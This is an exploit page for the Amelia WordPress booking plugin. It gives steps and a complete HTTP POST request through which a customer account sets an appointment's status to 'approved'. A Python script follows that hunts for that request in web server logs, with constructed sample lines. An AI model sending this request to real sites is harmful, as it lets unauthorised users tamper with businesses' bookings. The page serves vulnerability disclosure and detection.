## https://sploitus.com/exploit?id=WPEX-ID:1A92A65F-E9DF-41B5-9A1C-8E24EE9BF50E
1. Make a booking to become a customer.
2. Log in to WordPress with the customer account and make the following request (the ameliaNonce can be retrieved via "wpAmeliaNonce" under the Amelia dashboard):

```
POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/appointments/status/2&ameliaNonce=e9ff5220c4 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8
Content-Length: 711
Connection: close
Cookie: [customer+ cookies]

{"status": "approved","packageCustomerId": null}
```
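For defenders, the request shape above can be hunted for in web server access logs. The following is an added example, not part of the original page or the plugin's code: it assumes the Apache/nginx "combined" log format, uses constructed sample lines, and the function names are hypothetical. Access logs do not record the WordPress role, so each hit still has to be checked against the accounts that are allowed to change appointment status.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Assumption: Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Call path used by the request on this page: /appointments/status/<id>
STATUS_CALL_RE = re.compile(r'^/appointments/status/(\d+)/?$')


def match_status_change(line):
    """Return a dict describing the hit, or None if the line is unrelated."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    url = urlsplit(m["target"])
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    query = parse_qs(url.query)  # also percent-decodes, e.g. %2F -> /
    if query.get("action", [""])[-1] != "wpamelia_api":
        return None
    call = STATUS_CALL_RE.match(query.get("call", [""])[-1])
    if not call:
        return None
    return {"ip": m["ip"], "time": m["ts"], "http_status": int(m["status"]),
            "appointment_id": int(call.group(1))}


def summarize(lines):
    """Group hits by client IP so each source can be checked against staff."""
    by_ip = defaultdict(list)
    for line in lines:
        hit = match_status_change(line)
        if hit:
            by_ip[hit["ip"]].append(hit["appointment_id"])
    return dict(by_ip)


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/appointments/status/2&ameliaNonce=0000000000 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=%2Fappointments%2Fstatus%2F3&ameliaNonce=0000000000 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-admin/admin-ajax.php?action=wpamelia_api&call=/appointments/2 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 60 "-" "Mozilla/5.0"',
]

print(summarize(SAMPLE_LOG))
```

The second sample line shows why the query string is decoded before matching: a percent-encoded `call` value would slip past a plain substring search.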